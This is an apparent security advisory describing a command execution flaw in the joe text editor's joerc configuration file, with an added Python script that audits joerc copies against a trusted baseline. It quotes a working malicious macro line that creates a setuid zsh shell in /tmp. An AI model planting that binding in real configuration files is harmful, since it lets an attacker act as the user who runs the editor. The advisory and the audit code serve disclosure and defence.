Joe Text Editor .joerc Arbitrary Command Execution Vulnerability

After copying the /usr/local/lib/joerc file to a world-writable directory, an attacker can add the following line to create a malicious key binding:

:def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype

This binds the creation of a SUID shell in the /tmp directory to the keys ^[l. The exploit allows the attacker to assume the identity of the user running joe.
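For auditing, a joerc copy found outside the system location can be compared against the trusted /usr/local/lib/joerc, flagging any shell command a macro carries that the trusted file does not. The following is an added example, not part of the original advisory or of joe itself; the function names and the BASELINE line (the line above without its two appended commands) are assumptions made for illustration, and every quoted macro argument is treated as shell text.

```python
import re

# A joerc macro definition, e.g.  :def spellfile filt,"...",rtn,retype
DEF_RE = re.compile(r'^:def\s+(\S+)\s+(.*)$')
# Double-quoted macro arguments; after "filt" this text is run as a shell filter.
STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def macro_commands(joerc_text):
    """Return {macro_name: [command, ...]} for every :def line in a joerc."""
    macros = {}
    for line in joerc_text.splitlines():
        m = DEF_RE.match(line)
        if not m:
            continue
        name, body = m.groups()
        cmds = []
        for quoted in STR_RE.findall(body):
            # Split the filter string into its ';'-separated commands.
            cmds.extend(c.strip() for c in quoted.split(';') if c.strip())
        macros[name] = cmds
    return macros


def audit(candidate_text, baseline_text):
    """List (macro, command) pairs in the candidate that the baseline lacks."""
    base = macro_commands(baseline_text)
    findings = []
    for name, cmds in macro_commands(candidate_text).items():
        known = set(base.get(name, []))
        findings.extend((name, c) for c in cmds if c not in known)
    return findings


# Constructed baseline: assumed content of the trusted system joerc.
BASELINE = (':def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp '
            '</dev/tty>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype\n')
# The modified line quoted in this advisory.
CANDIDATE = (':def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp '
             '</dev/tty>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;'
             'cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype\n')

if __name__ == "__main__":
    for name, cmd in audit(CANDIDATE, BASELINE):
        print(f"macro {name!r}: command not in trusted joerc: {cmd}")
```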


 

Copyright 2010, SecurityFocus